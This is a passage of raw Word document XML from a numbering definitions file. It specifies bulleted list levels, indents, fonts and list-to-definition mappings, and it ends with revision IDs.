      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="01740746">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5404A2BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FD486B36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8ECA7738">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1AE07428">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AEBCECCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="85BCEEF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EC844C36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="39C757F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="725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44A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F9C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7492"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="C3E6024C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="675481A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9B0CA6E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="791A44CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AC96881A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F21CBF04">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="762259AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="63B23B28">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E222F464">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42601CDC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B0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821A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="E6829542">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7ABA947A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="AF70C7AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="502E7F90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="42AE7ABE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2F624638">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="420A0566">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9510283E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4F2E1BD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="512001E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5E821472">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A2540BBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A5C86432">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5018FDBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B4386744">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FDFC511A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C20CEB86">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="1FD6B78A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D9647654">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="53727C05"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="4A22637A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B4105E24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EE420C4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2B723D46">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="1E260AC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="79366934">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="85EE70FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="E064E8D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E5C09066">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="54CF599E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95B48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55370B7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D856E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C280C82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="037ACAEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="160C1EF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5F1C4EF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9FFE512E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E020AEB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0DACBDC6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="05284A7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C48E25E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="728CFF00">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7BD6087E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D9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5792E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="3AF67F36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D5E8E7A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="00BA5788">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5C2C9CAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AFBC7174">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D7FA45E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28546D30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="59AEC2EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7BBEAAF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7E3C2432"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B5E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7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="5"/>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31"/>
    <w:rsid w:val="000012A1"/>
    <w:rsid w:val="0000290E"/>
    <w:rsid w:val="00004BD5"/>
    <w:rsid w:val="000058BF"/>
